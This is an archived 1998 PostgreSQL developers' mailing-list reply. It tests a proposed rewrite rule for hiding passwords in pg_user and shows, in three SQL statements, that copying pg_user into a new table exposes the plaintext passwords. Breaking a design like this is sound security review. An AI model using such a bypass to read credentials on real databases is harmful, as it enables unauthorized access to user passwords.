From: | jwieck(at)debis(dot)com (Jan Wieck) |
---|---|
To: | Andreas(dot)Zeugswetter(at)telecom(dot)at (Zeugswetter Andreas SARZ) |
Cc: | pgsql-hackers(at)hub(dot)org |
Subject: | Re: [HACKERS] Solution to the pg_user passwd problem !?? (c) |
Date: | 1998-02-19 14:55:07 |
Message-ID: | m0y5XNU-000BFRC@orion.SAPserv.Hamburg.dsh.de |
Views: | Raw Message | Whole Thread | Download mbox | Resend email |
Thread: | |
Lists: | pgsql-hackers |
>
> Hi all,
>
> What about:
> grant select on pg_user to public;
> create rule pg_user_hide_pw as on
> select to pg_user.passwd
> do instead select '********' as passwd;
>
> Then if I do:
> select * from pg_user;
> usename |usesysid|usecreatedb|usetrace|usesuper|usecatupd|passwd |valuntil
> --------+--------+-----------+--------+--------+---------+--------+---------
> -------------------
> postgres| 6|t |t |t |t |********|Sat Jan
> 31 07:00:00 2037 NFT
> zeus | 60|t |t |f |t |********|
> (2 rows)
>
> Also the \d works for all users !
>
> Only "disadvantage" is that noone can read passwd without first dropping the
> rule pg_user_hide_pw,
> I consider this a feature though ;-)
>
> Since the userauthentication bypasses the rewrite mechanism the logins,
> alter user .. and others do work !
>
> Can all of you try to crack this ?
Cracked!
create table get_passwds (usename name, passwd text);
insert into get_passwds select usename, passwd from pg_user;
select * from get_passwds;
usename|passwd
-------+------
pgsql |
wieck |test
(2 rows)
Sorry, Jan
--
#======================================================================#
# It's easier to get forgiveness for being wrong than for being right. #
# Let's break this rule - forgive me. #
#======================================== jwieck(at)debis(dot)com (Jan Wieck) #
From | Date | Subject | |
---|---|---|---|
Next Message | Zeugswetter Andreas SARZ | 1998-02-19 14:58:08 | AW: [HACKERS] Solution to the pg_user passwd problem !?? (c) |
Previous Message | Bruce Momjian | 1998-02-19 14:50:32 | Re: [HACKERS] Solution to the pg_user passwd problem !?? (c) |